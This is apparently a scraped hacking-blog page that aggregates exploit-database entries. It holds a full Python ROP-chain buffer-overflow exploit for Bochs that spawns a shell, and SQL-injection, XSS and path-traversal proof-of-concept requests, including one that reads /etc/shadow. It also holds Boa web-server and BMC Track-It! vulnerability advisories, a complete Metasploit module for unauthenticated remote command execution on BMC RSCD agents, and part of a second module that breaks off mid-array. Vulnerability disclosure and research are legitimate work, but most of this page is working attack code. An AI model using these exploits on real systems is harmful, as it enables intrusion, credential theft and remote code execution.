# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Program description:
# Bochs is a highly portable free IA-32 (x86) PC emulator written in C++, that
# runs on most popular platforms. It includes emulation of the Intel x86 CPU,
# common I/O devices, and a custom BIOS.
#
# Homepage: http://bochs.sourceforge.net/
# Version: 2.6-5
# Debian package: pool/main/b/bochs/bochs_2.6-5_i386.deb
import os, subprocess
from struct import pack
# gdb-peda$ run `python -c 'print "A"*1200+"DCBA"'`
#
# Program received signal SIGSEGV, Segmentation fault.
#
# [----------------------------------registers-----------------------------------]
# EAX: 0x1
# EBX: 0x41414141 ('AAAA')
# ECX: 0x8167fa0
(<_ZN13bx_real_sim_c16set_quit_contextEPA1_13__jmp_buf_tag>: mov
edx,DWORD PTR [esp+0x8])
# EDX: 0x99db660 --> 0x81f2fb4 --> 0x8167f90
(<_ZN13bx_real_sim_cD2Ev>: repz ret)
# ESI: 0x41414141 ('AAAA')
# EDI: 0x41414141 ('AAAA')
# EBP: 0x41414141 ('AAAA')
# ESP: 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# EIP: 0x41424344 ('DCBA')
# EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT
direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41424344
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffedc0 --> 0xb7089300 --> 0xb7032827 ("ISO-10646/UCS2/")
# 0004| 0xbfffedc4 --> 0xbfffede0 --> 0x2
# 0008| 0xbfffedc8 --> 0x0
# 0012| 0xbfffedcc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# 0016| 0xbfffedd0 --> 0x2
# 0020| 0xbfffedd4 --> 0xb7089000 --> 0x1b2db0
# 0024| 0xbfffedd8 --> 0x0
# 0028| 0xbfffeddc --> 0xb6eee286 (<__libc_start_main+246>: add esp,0x10)
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41424344 in ?? ()
# Padding goes here
junk = 'A'*1200
ropchain = pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276424) # @ .data + 4
ropchain += pack('<I', 0x080945aa) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08095473) # pop esi ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x081701a7) # mov dword ptr [esi], eax ; pop
ebx ; pop esi ; pop edi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08054cc4) # pop ebx ; ret
ropchain += pack('<I', 0x08276420) # @ .data
ropchain += pack('<I', 0x08235733) # pop ecx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x082350b5) # pop edx ; ret
ropchain += pack('<I', 0x08276428) # @ .data + 8
ropchain += pack('<I', 0x08099780) # xor eax, eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804d559) # inc eax ; ret
ropchain += pack('<I', 0x0804f101) # int 0x80
crafted_buff = junk + ropchain
try:
print("[*] BOCHS 2.6-5 Buffer Overflow - Exploit by Juan Sacco")
print("[*] Running, wait for the shell")
subprocess.call(["bochs-bin", crafted_buff])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "[*] Sorry! BOCHS not found!"
else:
print "[*] Error executing exploit"
raise
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863123828
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/64278/info
BoastMachine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://example.com/user.php
(POST - blog)
blog='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
# Exploit Title: Boa Web Server v0.94.14 - Authentication Bypass
#Date: 19-11-2022
# Exploit Author: George Tsimpidas
# Vendor: https://github.com/gpg/boa
# CVE: N/A
# Tested on: Debian 5.18.5
Description :
Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate the
correct security constraint on the HEAD http method allowing everyone
to bypass the Basic Authorization Mechanism.
Culprit :
if (!memcmp(req->logline, "GET ", 4))
req->method = M_GET;
else if (!memcmp(req->logline, "HEAD ", 5))
/* head is just get w/no body */
req->method = M_HEAD;
else if (!memcmp(req->logline, "POST ", 5))
req->method = M_POST;
else {
log_error_doc(req);
fprintf(stderr, "malformed request: \"%s\"\n", req->logline);
send_r_not_implemented(req);
return 0;
}
The req->method = M_HEAD; is being parsed directly on the response.c
file, looking at how the method is being implemented for one of the
response codes :
/* R_NOT_IMP: 505 */
void send_r_bad_version(request * req)
{
SQUASH_KA(req);
req->response_status = R_BAD_VERSION;
if (!req->simple) {
req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");
print_http_headers(req);
req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminate
header */
}
if (req->method != M_HEAD) {
req_write(req,
"<HTML><HEAD><TITLE>505 HTTP Version Not
Supported</TITLE></HEAD>\n"
"<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP
versions "
"other than 0.9 and 1.0 "
"are not supported in Boa.\n<p><p>Version encountered: ");
req_write(req, req->http_version);
req_write(req, "<p><p></BODY></HTML>\n");
}
req_flush(req);
}
Above code condition indicates that if (req->method != M_HEAD) therefore
if the the requested method does not equal to M_HEAD then
req_write(req,
"<HTML><HEAD><TITLE>505 HTTP Version Not
Supported</TITLE></HEAD>\n"
"<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTP
versions "
"other than 0.9 and 1.0 "
"are not supported in Boa.\n<p><p>Version encountered: ");
req_write(req, req->http_version);
req_write(req, "<p><p></BODY></HTML>\n");
}
So if the method actually contains the http method of HEAD it's being
passed for every function that includes all the response code methods.
###############################################################
ID: S21SEC-005-en
Title: Vulnerability in BOA web server v0.94.8.2
Date: 03/10/2000
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: llmora
Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt
Release: Public
###############################################################
S 2 1 S E C
http://www.s21sec.com
Vulnerability in BOA web server v0.94.8.2
There is a security bug in BOA v0.94.8.2 that allows a malicious
user to access files outside the document root of the web server
as the user the server runs as.
About BOA
---------
Boa is an open source high performance web server for Unix-alike
computers (http://www.boa.org). It does file serving and dynamic
content generation via CGI.
Vulnerability description
-------------------------
- Reading any file in the web server
The boa web server suffers of the well-known "../.." web server
problem. If we request a document from the web server,
using the "../.." technique, we get:
homer:~$ telnet ilf 80
Escape character is '^]'.
GET /../../../../../../../../../../../etc/motd HTTP/1.0
HTTP/1.0 404 Not Found
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H1>404 Not Found</H1>
The requested URL /etc/motd was not found on this server.
</BODY></HTML>
Connection closed by foreign host.
homer:~$
So apparently it doesn't work, as boa checks for "/.." in the path.
By URL-encoding the "." in the request, we are able to skip the ".." test,
allowing us to access the contents of any file the user running the
web server has access to:
homer:~$ telnet ilf 80
GET
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2
E/etc/motd HTTP/1.0
HTTP/1.0 200 OK
[... the /etc/motd file content is shown]
Connection closed by foreign host.
homer:~$
If the administrator enables extension based CGI support with a line like
this in the boa.conf file:
AddType application/x-httpd-cgi cgi
then a request for a file ending in .cgi will result in the file being
executed with the privileges of the user id running the web server. This
file can be placed in any folder throughout the file system, not strictly
under the DocumentRoot, and be accessed using the previous bug, leading
to the web server account compromise.
Affected versions
-----------------
This bug has been tested and verified to be present in v0.94.8.2 of the boa
web server. Version 0.92 of boa is not affected by this problem.
Fix information
---------------
The boa development team has released v0.94.8.3 which fixes this
vulnerability.
Upgrades are available at the vendor website (http://www.boa.org).
S21SEC wishes to thank the boa development team for acknowledging the issue
and releasing a security patch in a matter of hours.
Additional information
----------------------
This vulnerability was found and researched by:
Lluis Mora llmora@s21sec.com
You can find the latest version of this advisory at:
http://www.s21sec.com/en/avisos/s21sec-005-en.txt
And other S21SEC advisories at http://www.s21sec.com/en/avisos/
BOA Web Server 0.94.14 - Access to arbitrary files as privileges
Title: Vulnerability in BOA Webserver 0.94.14
Date: 20-06-2017
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: Miguel Mendez Z
Vendor Homepage: http://www.boa.org
Version: Boa Webserver 0.94.14rc21
CVE: CVE-2017-9833
Vulnerability description
-------------------------
-We can read any file located on the server
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials
Vulnerable variable:
FILECAMERA=../../etc/shadow%00
Exploit link:
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
Poc:
http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
source: https://www.securityfocus.com/bid/61880/info
Bo-Blog is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
Bo-Blog 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com//view.php?go=userlist&ordered=1%27 [SQLi]
http://www.example.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E [XSS]
http://www.example.com//view.php?go=userlist&ordered=1&usergroup="/><script>alert(1);</script> [XSS]
>> Multiple critical vulnerabilities in BMC Track-It! 11.4
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
=================================================================================
Disclosure: 04/07/2016 / Last updated: 01/01/2017
>> Background and summary
BMC Track-It! exposes several .NET remoting services on port 9010. .NET remoting is a remote method technology similar to Java RMI or CORBA which allows you to invoke methods remotely and retrieve their result.
These remote methods are used when a technician uses the Track-It! client console to communicate with the central Track-It! server. A technician would invoke these methods for obtaining tickets, creating a new ticket, uploading files to tickets, etc.
On October 2014, two 0 day vulnerabilities for Track-It! 11.3 were disclosed (under CVE-2014-4872, see [1]). The vulnerabilities were due
to the Track-It! server accepting remote method invocations without any kind of authentication or encryption. The vulnerabilities were very severe: one allowed an attacker to execute code on the server as NETWORK SERVICE or SYSTEM, while the other would allow an attacker to obtain the domain administrator and SQL server passwords if the Track-It! server had password reset turned on.
These vulnerabilities were discovered in a trivial manner - simply by turning Wireshark on and observing the packets one could see the remote method invocations and objects being passed around. Duplicate and even triplicate packets would not be rejected by the server, which would execute whatever action was requested in the packet.
Disclosure was done by the US-CERT, which attempted to contact BMC but received no response after 45 days. After this period they released the vulnerability information and I released two Metasploit exploits.
BMC contacted me asking for advice on how to fix the issues, to which I responded:
"For #1 [file upload] and #2 [domain admin pass disclosure] the fix is to implement authentication and authorisation. There is no other way to fix it.
[...] Make sure the auth is done properly. You will have to negotiate some kind of session key using the user's credential at the start and use that session key for encryption going forward. Do not use a fixed key, as this can be reverse engineered.
If you don't implement such mechanism, it's just a question of time before someone else breaks your protection and finds new vulnerabilities."
On December 9th 2014, BMC released Track-It! 11.4 [2], which they claimed had fixed the security vulnerabilities.
At first glance, this seemed to be true. Traffic in Wireshark did seem to be encrypted. However upon further inspection, it became obvious that while the actual method invocation and its arguments were being encrypted using a DES key, there was still no authentication being done.
What this means in practice is that anyone can negotiate a new encryption key with the server and use that from then on to invoke remote methods without ever authenticating to the server, even for the initial encryption key exchange.
The code can be inspected by decompiling TrackIt.Utility.Common.dll. The interesting part is in:
namespace TrackIt.Utility.Common.Remoting
{
internal enum SecureTransaction
{
Uninitialized,
SendingPublicKey,
SendingSharedKey,
SendingEncryptedMessage,
SendingEncryptedResult,
UnknownIdentifier,
UnauthenticatedClient
}
}
This represents the state machine that the server uses to track client requests. The initial state is UnauthenticatedClient for any unknown client. A typical communication would be as follows:
1- Client generates a RSA key, which it shares with the server by sending a Modulus and an Exponent.
2- Server creates a DES key and sends that key back to the client
3- Client and server now share an encryption key; that key is used to pass back messages back and forth (states SendingEncryptedMessage and SendingEncryptedResult).
As it is evident, at no point there is any authentication or credentials being passed from the client to the server. So while all traffic is encrypted, anyone can negotiate an encryption key with the server and invoke any remote method.
From here on, building an exploit is trivial. All that is needed is to import the library DLL's from the Track-It! client application and invoke the methods in the code.
A special thanks to SecuriTeam Secure Disclosure (SSD), which have assisted me in disclosing this vulnerability to BMC. Their advisory can be found at https://blogs.securiteam.com/index.php/archives/2713.
Exploit code for this vulnerability has been released, and can be found in the same github repository as this advisory [3].
>> Technical details:
#1
Vulnerability: Remote code execution via file upload
CVE-2016-6598
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar)
The application exposes an unauthenticated .NET remoting file storage service (FileStorageService) on port 9010.
This service contains a method that allows uploading a file to an arbitrary path on the machine that is running Track-It!. This can be used to upload a file to the web root and achieve code execution as NETWORK SERVICE or SYSTEM.
#2
Vulnerability: Domain administrator and SQL server user credentials disclosure
CVE-2016-6599
Attack Vector: Remote
Constraints: None; exploitable by an unauthenticated attacker
Affected versions: 11.4 (versions <= 11.3 are affected by CVE-2014-4872, which is very similar)
The application exposes an unauthenticated .NET remoting configuration service (ConfigurationService) on port 9010.
This service contains a method that can be used to retrieve a configuration file that contains the application database name, username and password as well as the domain administrator username and password. These are encrypted with a fixed key and IV ("NumaraIT") using the DES algorithm. The domain administrator username and password can only be obtained if the Self-Service component is enabled, which is the most common scenario in enterprise deployments.
>> Fix:
Upgrade to BMC Track-It! 11.5 or above.
>> References:
[1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt
[2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available
[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43883.zip)
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'BMC Server Automation RSCD Agent NSH Remote ' \
'Command Execution',
'Description' => %q(
This module exploits a weak access control check in the BMC Server
Automation RSCD agent that allows arbitrary operating system commands
to be executed without authentication.
Note: Under Windows, non-powershell commands may need to be prefixed
with 'cmd /c'.
),
'Author' =>
[
'Olga Yanushkevich, ERNW <@yaole0>', # Vulnerability discovery
'Nicky Bloor (@NickstaDB) <nick@nickbloor.co.uk>' # RCE payload and Metasploit module
],
'References' =>
[
['URL', 'https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/'],
['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
['CVE', '2016-1542'],
['CVE', '2016-1543']
],
'DisclosureDate' => 'Mar 16 2016',
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Platform' => %w[win linux unix],
'Targets' =>
[
['Automatic', {}],
[
'Windows/VBS Stager', {
'Platform' => 'win',
'Payload' => { 'Space' => 8100 }
}
],
[
'Unix/Linux', {
'Platform' => %w[linux unix],
'Payload' => { 'Space' => 32_700 }
}
],
[
'Generic Command', {
'Arch' => ARCH_CMD,
'Platform' => %w[linux unix win]
}
]
],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'Payload' => {
'BadChars' => "\x00\x09\x0a"
},
'CmdStagerFlavor' => %w[vbs echo])
)
register_options(
[
Opt::RPORT(4750)
]
)
deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
end
def check
# Send agentinfo request and check result
vprint_status('Checking for BMC with agentinfo request.')
res = send_agentinfo_request
# Check for successful platform detection
if res[0] == 1
vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
return CheckCode::Detected
end
# Get first four bytes of the packet which should hold the content length
res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0
# Return unknown if the packet format appears correct (length field check)
if res[1] && res[1].length - 4 == res_len
vprint_warning('Target appears to be BMC, however an unexpected ' \
'agentinfo response was returned.')
vprint_warning('Response: ' + res[1])
return CheckCode::Unknown
end
# Invalid response, probably not a BMC RSCD target
vprint_error('The target does not appear to be a BMC RSCD agent.')
vprint_error('Response: ' + res[1]) if res[1]
CheckCode::Safe
end
def exploit
# Do auto target selection
target_name = target.name
if target_name == 'Automatic'
# Attempt to detect the target platform
vprint_status('Detecting remote platform for auto target selection.')
platform = send_agentinfo_request
# Fail if platform detection was unsuccessful
if platform[0].zero?
fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
'detecting target platform.')
end
# Set target based on returned platform
target_name = if platform[1].downcase.include?('windows')
'Windows/VBS Stager'
else
'Unix/Linux'
end
end
# Exploit based on target
vprint_status('Generating and delivering payload.')
if target_name == 'Windows/VBS Stager'
if payload.raw.start_with?('powershell', 'cmd')
execute_command(payload.raw)
else
execute_cmdstager(flavor: :vbs, linemax: payload.space)
end
handler
elsif target_name == 'Unix/Linux'
execute_cmdstager(flavor: :echo, linemax: payload.space)
handler
elsif target_name == 'Generic Cmd'
send_nexec_request(payload.raw, true)
end
end
# Execute a command but don't print output
def execute_command(command, opts = {})
if opts[:flavor] == :vbs
if command.start_with?('powershell') == false
if command.start_with?('cmd') == false
send_nexec_request('cmd /c ' + command, false)
return
end
end
end
send_nexec_request(command, false)
end
# Connect to the RSCD agent and execute a command via nexec
def send_nexec_request(command, show_output)
# Connect and auth
vprint_status('Connecting to RSCD agent and sending fake auth.')
connect_to_rscd
send_fake_nexec_auth
# Generate and send the payload
vprint_status('Sending command to execute.')
sock.put(generate_cmd_pkt(command))
# Finish the nexec request
sock.put("\x00\x00\x00\x22\x30\x30\x30\x30\x30\x30\x31\x61\x30\x30\x30" \
"\x30\x30\x30\x31\x32\x77\x38\x30\x3b\x34\x31\x3b\x33\x39\x30" \
"\x35\x38\x3b\x32\x34\x38\x35\x31")
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
"\x30\x30\x30\x30\x32\x65\x7f")
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
"\x30\x30\x30\x30\x32\x69\x03")
sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
"\x30\x30\x30\x30\x32\x74\x31")
sock.put("\x00\x00\x00\x1c\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30" \
"\x30\x30\x30\x30\x63\x77\x38\x30\x3b\x34\x31\x3b\x38\x30\x3b" \
"\x34\x31")
sock.put("\x00\x00\x00\x11\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30" \
"\x30\x30\x30\x30\x31\x7a")
# Get the response from the RSCD agent and disconnect
vprint_status('Reading response from RSCD agent.')
res = read_cmd_output
if show_output == true
if res && res[0] == 1
print_good("Output\n" + res[1])
else
print_warning('Command execution failed, the command may not exist.')
vprint_warning("Output\n" + res[1])
end
end
disconnect
end
# Attempt to retrieve RSCD agent info and return the platform string
def send_agentinfo_request
# Connect and send fake auth
vprint_status('Connecting to RSCD agent and sending fake auth.')
connect_to_rscd
send_fake_agentinfo_auth
# Send agentinfo request, read the response, and disconnect
vprint_status('Requesting agent information.')
sock.put("\x00\x00\x00\x32\x30\x30\x30\x30\x30\x30\x32\x61\x30\x30\x30" \
"\x30\x30\x30\x31\x30\x36\x34\x3b\x30\x3b\x32\x3b\x36\x66\x37" \
"\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x30\x32\x34" \
"\x31\x30\x30\x30\x30\x30\x30\x30\x30")
res = sock.get_once
disconnect
# Return the platform field from the response if it looks valid
res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
return [1, res.split(';')[4]] if res &&
res.split(';').length > 6 &&
res.length == (res_len + 4)
# Invalid or unexpected response format, return the complete response
[0, res]
end
# Connect to the target and upgrade to an encrypted connection
def connect_to_rscd
connect
sock.put('TLS')
sock.extend(Rex::Socket::SslTcp)
sock.sslctx = OpenSSL::SSL::SSLContext.new(:SSLv23)
sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
sock.sslctx.options = OpenSSL::SSL::OP_ALL
sock.sslctx.ciphers = 'ALL'
sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
sock.sslsock.connect
end
# Send fake agentinfo auth packet and ignore the response
def send_fake_agentinfo_auth
sock.put("\x00\x00\x00\x5e\x30\x30\x30\x30\x30\x30\x35\x36\x30\x30\x30" \
"\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x35\x3b\x38\x38" \
"\x30\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x35" \
"\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x39" \
"\x3b\x61\x67\x65\x6e\x74\x69\x6e\x66\x6f\x3b\x2d\x3b\x2d\x3b" \
"\x30\x3b\x2d\x3b\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) +
"\x3b\x55\x54\x46\x2d\x38")
sock.get_once
end
# Send fake nexec auth packet and ignore the response
def send_fake_nexec_auth
sock.put("\x00\x00\x00\x5a\x30\x30\x30\x30\x30\x30\x35\x32\x30\x30\x30" \
"\x30\x30\x30\x31\x31\x36\x35\x3b\x30\x3b\x33\x31\x3b\x64\x61" \
"\x34\x3b\x64\x61\x34\x3b\x30\x30\x30\x30\x30\x30\x30\x33\x31" \
"\x30\x3b\x30\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x35" \
"\x3b\x6e\x65\x78\x65\x63\x3b\x2d\x3b\x2d\x3b\x30\x3b\x2d\x3b" \
"\x31\x3b\x31\x3b\x37\x3b" + rand_text_alpha(7) + "\x3b\x55" \
"\x54\x46\x2d\x38")
sock.get_once
end
# Generate a payload packet
def generate_cmd_pkt(command)
# Encode back slashes
pkt = command.gsub('\\', "\xc1\xdc")
# Encode double quotes unless powershell is being used
pkt = pkt.gsub('"', "\xc2\x68") unless pkt.start_with?('powershell')
# Construct the body of the payload packet
pkt = pad_number(pkt.length + 32) + "\x30\x30\x30\x30\x30\x30\x31\x30" \
"\x62\x37\x3b\x30\x3b\x32\x3b\x63\x61\x65\x3b\x64\x61\x34\x3b\x30" +
pad_number(pkt.length) + pkt
# Prefix with the packet length and return
[pkt.length].pack('N') + pkt
end
# Convert the given number to a hex string padded to 8 chars
def pad_number(num)
format('%08x', num)
end
# Read the command output from the server
def read_cmd_output
all_output = ''
response_done = false
# Read the entire response from the RSCD service
while response_done == false
# Read a response chunk
chunk = sock.get_once
next unless chunk && chunk.length > 4
chunk_len = chunk[0..3].unpack('N')[0]
chunk = chunk[4..chunk.length]
chunk += sock.get_once while chunk.length < chunk_len
# Check for the "end of output" chunk
if chunk_len == 18 && chunk.start_with?("\x30\x30\x30\x30\x30\x30\x30" \
"\x61\x30\x30\x30\x30\x30\x30" \
"\x30\x32\x78")
# Response has completed
response_done = true
elsif all_output == ''
# Keep the first response chunk as-is
all_output += chunk
# If the command failed, we're done
response_done = true unless all_output[8..15].to_i(16) != 1
else
# Append everything but the length fields to the output buffer
all_output += chunk[17..chunk.length]
end
end
# Return output if response indicated success
return [1, all_output[26..all_output.length]] if
all_output &&
all_output.length > 26 &&
all_output[8..15].to_i(16) == 1
# Return nothing if there isn't enough data for error output
return [0, ''] unless all_output && all_output.length > 17
# Get the length of the error output and return the error
err_len = all_output[8..15].to_i(16) - 1
[0, all_output[17..17 + err_len]]
end
end
source: https://www.securityfocus.com/bid/47728/info
BMC Remedy Knowledge Management is prone to a default-account vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attackers can leverage the default account issue to bypass authentication and gain access without permission. Successful exploits can aid in further attacks.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Remedy Knowledge Management 7.5.00 is vulnerable; other versions may also be affected.
https://www.example.com/rkm/external.jsp?doc='%3balert(1)//&user=Self+Help
https://www.example.com/rkm/search.jsp?user=Self+Help&startDate=\'%3balert(1)//
https://www.example.com/rkm/usersettings.jsp?"><script>alert(1)</script>
https://www.example.com/rkm/viewdoc.jsp?doc=><script>alert(1)</script>&user=Self%20Help
https://www.example.com/rkm/AttachmentServlet?="><script>alert(1)</script>
https://www.example.com/rkm/index.jsp?user=Self%20Help
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
@deflater = nil
@inflater = nil
SBOXES = [
0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000,
0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0,
0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000,
0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000,
0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000,
0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000,
0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0,
0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002,
0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800,
0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000,
0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002,
0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000,
0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002,
0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004,
0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000,
0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004,
0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000,
